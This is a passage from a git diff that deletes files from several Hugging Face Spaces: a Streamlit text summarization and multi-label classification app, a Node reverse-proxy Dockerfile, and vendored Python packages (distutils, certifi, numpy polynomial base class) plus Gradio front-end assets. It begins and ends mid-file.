versionPredicateStr.strip() - if not versionPredicateStr: - raise ValueError("empty package restriction") - match = re_validPackage.match(versionPredicateStr) - if not match: - raise ValueError("bad package name in %r" % versionPredicateStr) - self.name, paren = match.groups() - paren = paren.strip() - if paren: - match = re_paren.match(paren) - if not match: - raise ValueError("expected parenthesized list: %r" % paren) - str = match.groups()[0] - self.pred = [splitUp(aPred) for aPred in str.split(",")] - if not self.pred: - raise ValueError("empty parenthesized list in %r" % versionPredicateStr) - else: - self.pred = [] - - def __str__(self): - if self.pred: - seq = [cond + " " + str(ver) for cond, ver in self.pred] - return self.name + " (" + ", ".join(seq) + ")" - else: - return self.name - - def satisfied_by(self, version): - """True if version is compatible with all the predicates in self. - The parameter version must be acceptable to the StrictVersion - constructor. It may be either a string or StrictVersion. - """ - for cond, ver in self.pred: - if not compmap[cond](version, ver): - return False - return True - - -_provision_rx = None - - -def split_provision(value): - """Return the name and optional version number of a provision. - - The version number, if given, will be returned as a `StrictVersion` - instance, otherwise it will be `None`. - - >>> split_provision('mypkg') - ('mypkg', None) - >>> split_provision(' mypkg( 1.2 ) ') - ('mypkg', StrictVersion ('1.2')) - """ - global _provision_rx - if _provision_rx is None: - _provision_rx = re.compile( - r"([a-zA-Z_]\w*(?:\.[a-zA-Z_]\w*)*)(?:\s*\(\s*([^)\s]+)\s*\))?$", re.ASCII - ) - value = value.strip() - m = _provision_rx.match(value) - if not m: - raise ValueError("illegal provides specification: %r" % value) - ver = m.group(2) or None - if ver: - with version.suppress_known_deprecation(): - ver = version.StrictVersion(ver) - return m.group(1), ver diff --git a/spaces/pleonova/multi-label-summary-text/app.py b/spaces/pleonova/multi-label-summary-text/app.py deleted file mode 100644 index 82974db498d8be941a790a66a8b50406a91b5e5d..0000000000000000000000000000000000000000 --- a/spaces/pleonova/multi-label-summary-text/app.py +++ /dev/null @@ -1,366 +0,0 @@ - -from os import write -import time -import pandas as pd -import base64 -from typing import Sequence -import streamlit as st -from sklearn.metrics import classification_report - - -# from models import create_nest_sentences, load_summary_model, summarizer_gen, load_model, classifier_zero -import models as md -from utils import examples_load, example_long_text_load -import json - -ex_text, ex_license, ex_labels, ex_glabels = examples_load() -ex_long_text = example_long_text_load() - - -# if __name__ == '__main__': -################################### -######## App Description ########## -################################### -st.markdown("### Long Text Summarization & Multi-Label Classification") -st.write("This app summarizes and then classifies your long text(s) with multiple labels using [BART Large CNN](https://huggingface.co/facebook/bart-large-cnn) for the summarization task and [BART Large MNLI](https://huggingface.co/facebook/bart-large-mnli) for the multi-labels matching. The keywords are independently generated using [KeyBERT](https://github.com/MaartenGr/KeyBERT) and not used in any downstream tasks.") -st.write("__Inputs__: User enters their own custom text(s) and labels.") -st.write("__Outputs__: A summary of the text, likelihood match score for each label and a downloadable csv of the results. \ - Includes additional options to generate a list of keywords and/or evaluate results against a list of ground truth labels, if available.") - - - -################################### -######## Example Input ########## -################################### -example_button = st.button(label='See Example') -if example_button: - example_text = ex_long_text #ex_text - display_text = 'Excerpt from Frankenstein:' + example_text + '"\n\n' + "[This is an excerpt from Project Gutenberg's Frankenstein. " + ex_license + "]" - input_labels = ex_labels - input_glabels = ex_glabels - title_name = 'Frankenstein, Chapter 3' -else: - display_text = '' - input_labels = '' - input_glabels = '' - title_name = 'Submitted Text' - - - -with st.form(key='my_form'): - ################################### - ######## Form: Step 1 ########## - ################################### - st.markdown("##### Step 1: Upload Text") - text_input = st.text_area("Input any text you want to summarize & classify here (keep in mind very long text will take a while to process):", display_text) - - text_csv_expander = st.expander(label=f'Want to upload multiple texts at once? Expand to upload your text files below.', expanded=False) - with text_csv_expander: - st.markdown('##### Choose one of the options below:') - st.write("__Option A:__") - uploaded_text_files = st.file_uploader(label="Upload file(s) that end with the .txt suffix", - accept_multiple_files=True, key = 'text_uploader', - type='txt') - st.write("__Option B:__") - uploaded_csv_text_files = st.file_uploader(label='Upload a CSV file with two columns: "title" and "text"', - accept_multiple_files=False, key = 'csv_text_uploader', - type='csv') - - if text_input == display_text and display_text != '': - text_input = example_text - - gen_keywords = st.radio( - "Generate keywords from text? (independent from the input labels below)", - ('Yes', 'No') - ) - - gen_summary = st.radio( - "Generate summary from text? (recommended for label matching below, but will take longer)", - ('Yes', 'No') - ) - - ################################### - ######## Form: Step 2 ########## - ################################### - st.write('\n') - st.markdown("##### Step 2: Enter Labels") - labels = st.text_input('Enter possible topic labels, which can be either keywords and/or general themes (comma-separated):',input_labels, max_chars=2000) - labels = list(set([x.strip() for x in labels.strip().split(',') if len(x.strip()) > 0])) - - labels_csv_expander = st.expander(label=f'Prefer to upload a list of labels instead? Click here to upload your CSV file.',expanded=False) - with labels_csv_expander: - uploaded_labels_file = st.file_uploader("Choose a CSV file with one column and no header, where each cell is a separate label", - key='labels_uploader') - - ################################### - ######## Form: Step 3 ########## - ################################### - st.write('\n') - st.markdown("##### Step 3: Provide Ground Truth Labels (_Optional_)") - glabels = st.text_input('If available, enter ground truth topic labels to evaluate results, otherwise leave blank (comma-separated):',input_glabels, max_chars=2000) - glabels = list(set([x.strip() for x in glabels.strip().split(',') if len(x.strip()) > 0])) - - - glabels_csv_expander = st.expander(label=f'Have a file with labels for the text? Click here to upload your CSV file.', expanded=False) - with glabels_csv_expander: - st.markdown('##### Choose one of the options below:') - st.write("__Option A:__") - uploaded_onetext_glabels_file = st.file_uploader("Single Text: Choose a CSV file with one column and no header, where each cell is a separate label", - key = 'onetext_glabels_uploader') - st.write("__Option B:__") - uploaded_multitext_glabels_file = st.file_uploader('Multiple Text: Choose a CSV file with two columns "title" and "label", with the cells in the title column matching the name of the files uploaded in step #1.', - key = 'multitext_glabels_uploader') - - - # threshold_value = st.slider( - # 'Select a threshold cutoff for matching percentage (used for ground truth label evaluation)', - # 0.0, 1.0, (0.5)) - - submit_button = st.form_submit_button(label='Submit') - -st.write("_For improvments/suggestions, please file an issue here: https://github.com/pleonova/multi-label-summary-text_") - - -################################### -####### Model Load Time ######### -################################### -with st.spinner('Loading pretrained models...'): - start = time.time() - summarizer = md.load_summary_model() - s_time = round(time.time() - start,4) - - start = time.time() - classifier = md.load_model() - c_time = round(time.time() - start,4) - - start = time.time() - kw_model = md.load_keyword_model() - k_time = round(time.time() - start,4) - - st.spinner(f'Time taken to load various models: {k_time}s for KeyBERT model & {s_time}s for BART summarizer mnli model & {c_time}s for BART classifier mnli model.') - # st.success(None) - - -if submit_button or example_button: - ################################### - ######## Load Text Data ####### - ################################### - if len(text_input) == 0 and len(uploaded_text_files) == 0 and uploaded_csv_text_files is None: - st.error("Enter some text to generate a summary") - else: - - if len(text_input) != 0: - text_df = pd.DataFrame.from_dict({'title': [title_name], 'text': [text_input]}) - - # OPTION A - elif len(uploaded_text_files) != 0: - st.markdown("### Text Inputs") - st.write('Files concatenated into a dataframe:') - file_names = [] - raw_texts = [] - for uploaded_file in uploaded_text_files: - text = str(uploaded_file.read(), "utf-8") - raw_texts.append(text) - title_file_name = uploaded_file.name.replace('.txt','') - file_names.append(title_file_name) - text_df = pd.DataFrame({'title': file_names, - 'text': raw_texts}) - st.dataframe(text_df.head()) - st.download_button( - label="Download data as CSV", - data=text_df.to_csv().encode('utf-8'), - file_name='title_text.csv', - mime='title_text/csv', - ) - # OPTION B - elif uploaded_csv_text_files is not None: - text_df = pd.read_csv(uploaded_csv_text_files) - - # Which input was used? If text area was used, ignore the 'title' - if len(text_input) != 0: - title_element = [] - else: - title_element = ['title'] - - - ################################### - ######## Text Chunks ########## - ################################### - with st.spinner('Breaking up text into more reasonable chunks (transformers cannot exceed a 1024 token max)...'): - # For each body of text, create text chunks of a certain token size required for the transformer - - text_chunks_lib = dict() - for i in range(0, len(text_df)): - nested_sentences = md.create_nest_sentences(document=text_df['text'][i], token_max_length=1024) - - # For each chunk of sentences (within the token max) - text_chunks = [] - for n in range(0, len(nested_sentences)): - tc = " ".join(map(str, nested_sentences[n])) - text_chunks.append(tc) - title_entry = text_df['title'][i] - text_chunks_lib[title_entry] = text_chunks - - - ################################ - ######## Keywords ########## - ################################ - if gen_keywords == 'Yes': - st.markdown("### Top Keywords") - with st.spinner("Generating keywords from text..."): - - kw_dict = dict() - text_chunk_counter = 0 - for key in text_chunks_lib: - keywords_list = [] - for text_chunk in text_chunks_lib[key]: - text_chunk_counter += 1 - keywords_list += md.keyword_gen(kw_model, text_chunk) - kw_dict[key] = dict(keywords_list) - # Display as a dataframe - kw_df0 = pd.DataFrame.from_dict(kw_dict).reset_index() - kw_df0.rename(columns={'index': 'keyword'}, inplace=True) - kw_df = pd.melt(kw_df0, id_vars=['keyword'], var_name='title', value_name='score').dropna() - - kw_column_list = ['keyword', 'score'] - kw_df = kw_df[kw_df['score'] > 0.25][title_element + kw_column_list].sort_values(title_element + ['score'], ascending=False).reset_index().drop(columns='index') - - st.dataframe(kw_df) - st.download_button( - label="Download data as CSV", - data=kw_df.to_csv().encode('utf-8'), - file_name='title_keywords.csv', - mime='title_keywords/csv', - ) - - - ################################### - ########## Summarize ########## - ################################### - if gen_summary == 'Yes': - st.markdown("### Summary") - with st.spinner(f'Generating summaries for {len(text_df)} texts consisting of a total of {text_chunk_counter} chunks (this may take a minute)...'): - sum_dict = dict() - for i, key in enumerate(text_chunks_lib): - with st.expander(label=f'({i+1}/{len(text_df)}) Expand to see intermediate summary generation details for: {key}', expanded=False): - # for key in text_chunks_lib: - summary = [] - for num_chunk, text_chunk in enumerate(text_chunks_lib[key]): - chunk_summary = md.summarizer_gen(summarizer, sequence=text_chunk, maximum_tokens=400, minimum_tokens=100) - summary.append(chunk_summary) - - st.markdown(f"###### Original Text Chunk {num_chunk+1}/{len(text_chunks)}" ) - st.markdown(text_chunk) - st.markdown(f"###### Partial Summary {num_chunk+1}/{len(text_chunks)}") - st.markdown(chunk_summary) - - # Combine all the summaries into a list and compress into one document, again - final_summary = "\n\n".join(list(summary)) - sum_dict[key] = [final_summary] - - sum_df = pd.DataFrame.from_dict(sum_dict).T.reset_index() - sum_df.columns = ['title', 'summary_text'] - # TO DO: Make sure summary_text does not exceed the token length - - st.dataframe(sum_df) - st.download_button( - label="Download data as CSV", - data=sum_df.to_csv().encode('utf-8'), - file_name='title_summary.csv', - mime='title_summary/csv', - ) - - ################################### - ########## Classifier ######### - ################################### - if ((len(text_input) == 0 and uploaded_text_files is None and uploaded_csv_text_files is None) - or (len(labels) == 0 and uploaded_labels_file is None)): - st.error('Enter some text and at least one possible topic to see label predictions.') - else: - if gen_summary == 'Yes': - st.markdown("### Top Label Predictions on Summary vs Full Text") - else: - st.markdown("### Top Label Predictions on Full Text") - - if uploaded_labels_file is not None: - labels_df = pd.read_csv(uploaded_labels_file, header=None) - label_list = labels_df.iloc[:, 0] - else: - label_list = labels - - with st.spinner('Matching labels...(may take some time)'): - if gen_summary == 'Yes': - labels_sum_col_list = ['title', 'label', 'scores_from_summary'] - labels_sum_df = pd.DataFrame(columns=labels_sum_col_list) - - labels_full_col_list = ['title', 'label', 'scores_from_full_text'] - labels_full_df = pd.DataFrame(columns=labels_full_col_list) - - for i in range(0, len(text_df)): - if gen_summary == 'Yes': - s_topics, s_scores = md.classifier_zero(classifier, sequence=sum_df['summary_text'][i], labels=label_list, multi_class=True) - ls_df = pd.DataFrame({'label': s_topics, 'scores_from_summary': s_scores}) - ls_df['title'] = text_df['title'][i] - labels_sum_df = pd.concat([labels_sum_df, ls_df[labels_sum_col_list]]) - - f_topics, f_scores = md.classifier_zero(classifier, sequence=text_df['text'][i], labels=label_list, multi_class=True) - lf_df = pd.DataFrame({'label': f_topics, 'scores_from_full_text': f_scores}) - lf_df['title'] = text_df['title'][i] - labels_full_df = pd.concat([labels_full_df, lf_df[labels_full_col_list]]) - - with st.expander(f'({i+1}/{len(text_df)}) See intermediate label matching results for: {text_df["title"][i]}'): - if gen_summary == 'Yes': - st.dataframe(pd.merge(ls_df, lf_df, on=['title','label'])) - else: - st.dataframe(lf_df) - - if gen_summary == 'Yes': - label_match_df = pd.merge(labels_sum_df, labels_full_df, on=['title', 'label']) - else: - label_match_df = labels_full_df.copy() - - ################################### - ####### Ground Truth Labels ###### - ################################### - if len(glabels) > 0: - gdata = pd.DataFrame({'label': glabels}) - join_list = ['label'] - elif uploaded_onetext_glabels_file is not None: - gdata = pd.read_csv(uploaded_onetext_glabels_file, header=None) - join_list = ['label'] - gdata.columns = join_list - elif uploaded_multitext_glabels_file is not None: - gdata = pd.read_csv(uploaded_multitext_glabels_file) - join_list = ['title', 'label'] - gdata.columns = join_list - - if len(glabels) > 0 or uploaded_onetext_glabels_file is not None or uploaded_multitext_glabels_file is not None: - gdata['correct_match'] = True - label_match_df = pd.merge(label_match_df, gdata, how='left', on=join_list) - label_match_df['correct_match'].fillna(False, inplace=True) - - st.dataframe(label_match_df) #.sort_values(['title', 'label'], ascending=[False, False])) - st.download_button( - label="Download data as CSV", - data=label_match_df.to_csv().encode('utf-8'), - file_name='title_label_sum_full.csv', - mime='title_label_sum_full/csv', - ) - - # if len(glabels) > 0: - # st.markdown("### Evaluation Metrics") - # with st.spinner('Evaluating output against ground truth...'): - # - # section_header_description = ['Summary Label Performance', 'Original Full Text Label Performance'] - # data_headers = ['scores_from_summary', 'scores_from_full_text'] - # for i in range(0,2): - # st.markdown(f"###### {section_header_description[i]}") - # report = classification_report(y_true = data2[['is_true_label']], - # y_pred = (data2[[data_headers[i]]] >= threshold_value) * 1.0, - # output_dict=True) - # df_report = pd.DataFrame(report).transpose() - # st.markdown(f"Threshold set for: {threshold_value}") - # st.dataframe(df_report) - - st.success('All done!') - st.balloons() diff --git a/spaces/pompuritz/keroppurin/Dockerfile b/spaces/pompuritz/keroppurin/Dockerfile deleted file mode 100644 index 6c01c09373883afcb4ea34ae2d316cd596e1737b..0000000000000000000000000000000000000000 --- a/spaces/pompuritz/keroppurin/Dockerfile +++ /dev/null @@ -1,21 +0,0 @@ -FROM node:18-bullseye-slim - -RUN apt-get update && \ - -apt-get install -y git - -RUN git clone https://gitgud.io/khanon/oai-reverse-proxy.git /app - -WORKDIR /app - -RUN npm install - -COPY Dockerfile greeting.md* .env* ./ - -RUN npm run build - -EXPOSE 7860 - -ENV NODE_ENV=production - -CMD [ "npm", "start" ] \ No newline at end of file diff --git a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/certifi/__init__.py b/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/certifi/__init__.py deleted file mode 100644 index 8ce89cef706adc0d08fc4de5625a495e4003798e..0000000000000000000000000000000000000000 --- a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/certifi/__init__.py +++ /dev/null @@ -1,4 +0,0 @@ -from .core import contents, where - -__all__ = ["contents", "where"] -__version__ = "2023.07.22" diff --git a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/gradio/templates/frontend/assets/Example-d55a7a8d.js b/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/gradio/templates/frontend/assets/Example-d55a7a8d.js deleted file mode 100644 index 37eb47ed880979a3b61e304e08edabafaf9b4f3c..0000000000000000000000000000000000000000 --- a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/gradio/templates/frontend/assets/Example-d55a7a8d.js +++ /dev/null @@ -1,2 +0,0 @@ -const{SvelteComponent:c,append:u,attr:d,detach:g,element:o,init:v,insert:r,noop:f,safe_not_equal:y,set_data:m,text:b,toggle_class:i}=window.__gradio__svelte__internal;function h(a){let e,n;return{c(){e=o("div"),n=b(a[0]),d(e,"class","svelte-1ayixqk"),i(e,"table",a[1]==="table"),i(e,"gallery",a[1]==="gallery"),i(e,"selected",a[2])},m(t,l){r(t,e,l),u(e,n)},p(t,[l]){l&1&&m(n,t[0]),l&2&&i(e,"table",t[1]==="table"),l&2&&i(e,"gallery",t[1]==="gallery"),l&4&&i(e,"selected",t[2])},i:f,o:f,d(t){t&&g(e)}}}function q(a,e,n){let{value:t}=e,{type:l}=e,{selected:_=!1}=e;return a.$$set=s=>{"value"in s&&n(0,t=s.value),"type"in s&&n(1,l=s.type),"selected"in s&&n(2,_=s.selected)},[t,l,_]}class w extends c{constructor(e){super(),v(this,e,q,h,y,{value:0,type:1,selected:2})}}export{w as default}; -//# sourceMappingURL=Example-d55a7a8d.js.map diff --git a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/gradio/templates/frontend/assets/Index-d43fcb36.css b/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/gradio/templates/frontend/assets/Index-d43fcb36.css deleted file mode 100644 index a990b695131e200f077ed1748fcfb0587be148af..0000000000000000000000000000000000000000 --- a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/gradio/templates/frontend/assets/Index-d43fcb36.css +++ /dev/null @@ -1 +0,0 @@ -div.svelte-19hvt5v{display:flex;position:relative;border:1px solid var(--border-color-primary);border-top:none;border-bottom-right-radius:var(--container-radius);border-bottom-left-radius:var(--container-radius);padding:var(--block-padding)} diff --git a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/numpy/array_api/tests/__init__.py b/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/numpy/array_api/tests/__init__.py deleted file mode 100644 index 536062e3827921df637105680ea9e8ea879b8f3e..0000000000000000000000000000000000000000 --- a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/numpy/array_api/tests/__init__.py +++ /dev/null @@ -1,7 +0,0 @@ -""" -Tests for the array API namespace. - -Note, full compliance with the array API can be tested with the official array API test -suite https://github.com/data-apis/array-api-tests. This test suite primarily -focuses on those things that are not tested by the official test suite. -""" diff --git a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/numpy/polynomial/_polybase.py b/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/numpy/polynomial/_polybase.py deleted file mode 100644 index 9730574cf22e22823aaa0c77be9e630425cb2f79..0000000000000000000000000000000000000000 --- a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/numpy/polynomial/_polybase.py +++ /dev/null @@ -1,1206 +0,0 @@ -""" -Abstract base class for the various polynomial Classes. - -The ABCPolyBase class provides the methods needed to implement the common API -for the various polynomial classes. It operates as a mixin, but uses the -abc module from the stdlib, hence it is only available for Python >= 2.6. - -""" -import os -import abc -import numbers - -import numpy as np -from . import polyutils as pu - -__all__ = ['ABCPolyBase'] - -class ABCPolyBase(abc.ABC): - """An abstract base class for immutable series classes. - - ABCPolyBase provides the standard Python numerical methods - '+', '-', '*', '//', '%', 'divmod', '**', and '()' along with the - methods listed below. - - .. versionadded:: 1.9.0 - - Parameters - ---------- - coef : array_like - Series coefficients in order of increasing degree, i.e., - ``(1, 2, 3)`` gives ``1*P_0(x) + 2*P_1(x) + 3*P_2(x)``, where - ``P_i`` is the basis polynomials of degree ``i``. - domain : (2,) array_like, optional - Domain to use. The interval ``[domain[0], domain[1]]`` is mapped - to the interval ``[window[0], window[1]]`` by shifting and scaling. - The default value is the derived class domain. - window : (2,) array_like, optional - Window, see domain for its use. The default value is the - derived class window. - symbol : str, optional - Symbol used to represent the independent variable in string - representations of the polynomial expression, e.g. for printing. - The symbol must be a valid Python identifier. Default value is 'x'. - - .. versionadded:: 1.24 - - Attributes - ---------- - coef : (N,) ndarray - Series coefficients in order of increasing degree. - domain : (2,) ndarray - Domain that is mapped to window. - window : (2,) ndarray - Window that domain is mapped to. - symbol : str - Symbol representing the independent variable. - - Class Attributes - ---------------- - maxpower : int - Maximum power allowed, i.e., the largest number ``n`` such that - ``p(x)**n`` is allowed. This is to limit runaway polynomial size. - domain : (2,) ndarray - Default domain of the class. - window : (2,) ndarray - Default window of the class. - - """ - - # Not hashable - __hash__ = None - - # Opt out of numpy ufuncs and Python ops with ndarray subclasses. - __array_ufunc__ = None - - # Limit runaway size. T_n^m has degree n*m - maxpower = 100 - - # Unicode character mappings for improved __str__ - _superscript_mapping = str.maketrans({ - "0": "⁰", - "1": "¹", - "2": "²", - "3": "³", - "4": "⁴", - "5": "⁵", - "6": "⁶", - "7": "⁷", - "8": "⁸", - "9": "⁹" - }) - _subscript_mapping = str.maketrans({ - "0": "₀", - "1": "₁", - "2": "₂", - "3": "₃", - "4": "₄", - "5": "₅", - "6": "₆", - "7": "₇", - "8": "₈", - "9": "₉" - }) - # Some fonts don't support full unicode character ranges necessary for - # the full set of superscripts and subscripts, including common/default - # fonts in Windows shells/terminals. Therefore, default to ascii-only - # printing on windows. - _use_unicode = not os.name == 'nt' - - @property - def symbol(self): - return self._symbol - - @property - @abc.abstractmethod - def domain(self): - pass - - @property - @abc.abstractmethod - def window(self): - pass - - @property - @abc.abstractmethod - def basis_name(self): - pass - - @staticmethod - @abc.abstractmethod - def _add(c1, c2): - pass - - @staticmethod - @abc.abstractmethod - def _sub(c1, c2): - pass - - @staticmethod - @abc.abstractmethod - def _mul(c1, c2): - pass - - @staticmethod - @abc.abstractmethod - def _div(c1, c2): - pass - - @staticmethod - @abc.abstractmethod - def _pow(c, pow, maxpower=None): - pass - - @staticmethod - @abc.abstractmethod - def _val(x, c): - pass - - @staticmethod - @abc.abstractmethod - def _int(c, m, k, lbnd, scl): - pass - - @staticmethod - @abc.abstractmethod - def _der(c, m, scl): - pass - - @staticmethod - @abc.abstractmethod - def _fit(x, y, deg, rcond, full): - pass - - @staticmethod - @abc.abstractmethod - def _line(off, scl): - pass - - @staticmethod - @abc.abstractmethod - def _roots(c): - pass - - @staticmethod - @abc.abstractmethod - def _fromroots(r): - pass - - def has_samecoef(self, other): - """Check if coefficients match. - - .. versionadded:: 1.6.0 - - Parameters - ---------- - other : class instance - The other class must have the ``coef`` attribute. - - Returns - ------- - bool : boolean - True if the coefficients are the same, False otherwise. - - """ - if len(self.coef) != len(other.coef): - return False - elif not np.all(self.coef == other.coef): - return False - else: - return True - - def has_samedomain(self, other): - """Check if domains match. - - .. versionadded:: 1.6.0 - - Parameters - ---------- - other : class instance - The other class must have the ``domain`` attribute. - - Returns - ------- - bool : boolean - True if the domains are the same, False otherwise. - - """ - return np.all(self.domain == other.domain) - - def has_samewindow(self, other): - """Check if windows match. - - .. versionadded:: 1.6.0 - - Parameters - ---------- - other : class instance - The other class must have the ``window`` attribute. - - Returns - ------- - bool : boolean - True if the windows are the same, False otherwise. - - """ - return np.all(self.window == other.window) - - def has_sametype(self, other): - """Check if types match. - - .. versionadded:: 1.7.0 - - Parameters - ---------- - other : object - Class instance. - - Returns - ------- - bool : boolean - True if other is same class as self - - """ - return isinstance(other, self.__class__) - - def _get_coefficients(self, other): - """Interpret other as polynomial coefficients. - - The `other` argument is checked to see if it is of the same - class as self with identical domain and window. If so, - return its coefficients, otherwise return `other`. - - .. versionadded:: 1.9.0 - - Parameters - ---------- - other : anything - Object to be checked. - - Returns - ------- - coef - The coefficients of`other` if it is a compatible instance, - of ABCPolyBase, otherwise `other`. - - Raises - ------ - TypeError - When `other` is an incompatible instance of ABCPolyBase. - - """ - if isinstance(other, ABCPolyBase): - if not isinstance(other, self.__class__): - raise TypeError("Polynomial types differ") - elif not np.all(self.domain == other.domain): - raise TypeError("Domains differ") - elif not np.all(self.window == other.window): - raise TypeError("Windows differ") - elif self.symbol != other.symbol: - raise ValueError("Polynomial symbols differ") - return other.coef - return other - - def __init__(self, coef, domain=None, window=None, symbol='x'): - [coef] = pu.as_series([coef], trim=False) - self.coef = coef - - if domain is not None: - [domain] = pu.as_series([domain], trim=False) - if len(domain) != 2: - raise ValueError("Domain has wrong number of elements.") - self.domain = domain - - if window is not None: - [window] = pu.as_series([window], trim=False) - if len(window) != 2: - raise ValueError("Window has wrong number of elements.") - self.window = window - - # Validation for symbol - try: - if not symbol.isidentifier(): - raise ValueError( - "Symbol string must be a valid Python identifier" - ) - # If a user passes in something other than a string, the above - # results in an AttributeError. Catch this and raise a more - # informative exception - except AttributeError: - raise TypeError("Symbol must be a non-empty string") - - self._symbol = symbol - - def __repr__(self): - coef = repr(self.coef)[6:-1] - domain = repr(self.domain)[6:-1] - window = repr(self.window)[6:-1] - name = self.__class__.__name__ - return (f"{name}({coef}, domain={domain}, window={window}, " - f"symbol='{self.symbol}')") - - def __format__(self, fmt_str): - if fmt_str == '': - return self.__str__() - if fmt_str not in ('ascii', 'unicode'): - raise ValueError( - f"Unsupported format string '{fmt_str}' passed to " - f"{self.__class__}.__format__. Valid options are " - f"'ascii' and 'unicode'" - ) - if fmt_str == 'ascii': - return self._generate_string(self._str_term_ascii) - return self._generate_string(self._str_term_unicode) - - def __str__(self): - if self._use_unicode: - return self._generate_string(self._str_term_unicode) - return self._generate_string(self._str_term_ascii) - - def _generate_string(self, term_method): - """ - Generate the full string representation of the polynomial, using - ``term_method`` to generate each polynomial term. - """ - # Get configuration for line breaks - linewidth = np.get_printoptions().get('linewidth', 75) - if linewidth < 1: - linewidth = 1 - out = pu.format_float(self.coef[0]) - for i, coef in enumerate(self.coef[1:]): - out += " " - power = str(i + 1) - # Polynomial coefficient - # The coefficient array can be an object array with elements that - # will raise a TypeError with >= 0 (e.g. strings or Python - # complex). In this case, represent the coefficient as-is. - try: - if coef >= 0: - next_term = f"+ " + pu.format_float(coef, parens=True) - else: - next_term = f"- " + pu.format_float(-coef, parens=True) - except TypeError: - next_term = f"+ {coef}" - # Polynomial term - next_term += term_method(power, self.symbol) - # Length of the current line with next term added - line_len = len(out.split('\n')[-1]) + len(next_term) - # If not the last term in the polynomial, it will be two - # characters longer due to the +/- with the next term - if i < len(self.coef[1:]) - 1: - line_len += 2 - # Handle linebreaking - if line_len >= linewidth: - next_term = next_term.replace(" ", "\n", 1) - out += next_term - return out - - @classmethod - def _str_term_unicode(cls, i, arg_str): - """ - String representation of single polynomial term using unicode - characters for superscripts and subscripts. - """ - if cls.basis_name is None: - raise NotImplementedError( - "Subclasses must define either a basis_name, or override " - "_str_term_unicode(cls, i, arg_str)" - ) - return (f"·{cls.basis_name}{i.translate(cls._subscript_mapping)}" - f"({arg_str})") - - @classmethod - def _str_term_ascii(cls, i, arg_str): - """ - String representation of a single polynomial term using ** and _ to - represent superscripts and subscripts, respectively. - """ - if cls.basis_name is None: - raise NotImplementedError( - "Subclasses must define either a basis_name, or override " - "_str_term_ascii(cls, i, arg_str)" - ) - return f" {cls.basis_name}_{i}({arg_str})" - - @classmethod - def _repr_latex_term(cls, i, arg_str, needs_parens): - if cls.basis_name is None: - raise NotImplementedError( - "Subclasses must define either a basis name, or override " - "_repr_latex_term(i, arg_str, needs_parens)") - # since we always add parens, we don't care if the expression needs them - return f"{{{cls.basis_name}}}_{{{i}}}({arg_str})" - - @staticmethod - def _repr_latex_scalar(x, parens=False): - # TODO: we're stuck with disabling math formatting until we handle - # exponents in this function - return r'\text{{{}}}'.format(pu.format_float(x, parens=parens)) - - def _repr_latex_(self): - # get the scaled argument string to the basis functions - off, scale = self.mapparms() - if off == 0 and scale == 1: - term = self.symbol - needs_parens = False - elif scale == 1: - term = f"{self._repr_latex_scalar(off)} + {self.symbol}" - needs_parens = True - elif off == 0: - term = f"{self._repr_latex_scalar(scale)}{self.symbol}" - needs_parens = True - else: - term = ( - f"{self._repr_latex_scalar(off)} + " - f"{self._repr_latex_scalar(scale)}{self.symbol}" - ) - needs_parens = True - - mute = r"\color{{LightGray}}{{{}}}".format - - parts = [] - for i, c in enumerate(self.coef): - # prevent duplication of + and - signs - if i == 0: - coef_str = f"{self._repr_latex_scalar(c)}" - elif not isinstance(c, numbers.Real): - coef_str = f" + ({self._repr_latex_scalar(c)})" - elif not np.signbit(c): - coef_str = f" + {self._repr_latex_scalar(c, parens=True)}" - else: - coef_str = f" - {self._repr_latex_scalar(-c, parens=True)}" - - # produce the string for the term - term_str = self._repr_latex_term(i, term, needs_parens) - if term_str == '1': - part = coef_str - else: - part = rf"{coef_str}\,{term_str}" - - if c == 0: - part = mute(part) - - parts.append(part) - - if parts: - body = ''.join(parts) - else: - # in case somehow there are no coefficients at all - body = '0' - - return rf"${self.symbol} \mapsto {body}$" - - - - # Pickle and copy - - def __getstate__(self): - ret = self.__dict__.copy() - ret['coef'] = self.coef.copy() - ret['domain'] = self.domain.copy() - ret['window'] = self.window.copy() - ret['symbol'] = self.symbol - return ret - - def __setstate__(self, dict): - self.__dict__ = dict - - # Call - - def __call__(self, arg): - off, scl = pu.mapparms(self.domain, self.window) - arg = off + scl*arg - return self._val(arg, self.coef) - - def __iter__(self): - return iter(self.coef) - - def __len__(self): - return len(self.coef) - - # Numeric properties. - - def __neg__(self): - return self.__class__( - -self.coef, self.domain, self.window, self.symbol - ) - - def __pos__(self): - return self - - def __add__(self, other): - othercoef = self._get_coefficients(other) - try: - coef = self._add(self.coef, othercoef) - except Exception: - return NotImplemented - return self.__class__(coef, self.domain, self.window, self.symbol) - - def __sub__(self, other): - othercoef = self._get_coefficients(other) - try: - coef = self._sub(self.coef, othercoef) - except Exception: - return NotImplemented - return self.__class__(coef, self.domain, self.window, self.symbol) - - def __mul__(self, other): - othercoef = self._get_coefficients(other) - try: - coef = self._mul(self.coef, othercoef) - except Exception: - return NotImplemented - return self.__class__(coef, self.domain, self.window, self.symbol) - - def __truediv__(self, other): - # there is no true divide if the rhs is not a Number, although it - # could return the first n elements of an infinite series. - # It is hard to see where n would come from, though. - if not isinstance(other, numbers.Number) or isinstance(other, bool): - raise TypeError( - f"unsupported types for true division: " - f"'{type(self)}', '{type(other)}'" - ) - return self.__floordiv__(other) - - def __floordiv__(self, other): - res = self.__divmod__(other) - if res is NotImplemented: - return res - return res[0] - - def __mod__(self, other): - res = self.__divmod__(other) - if res is NotImplemented: - return res - return res[1] - - def __divmod__(self, other): - othercoef = self._get_coefficients(other) - try: - quo, rem = self._div(self.coef, othercoef) - except ZeroDivisionError: - raise - except Exception: - return NotImplemented - quo = 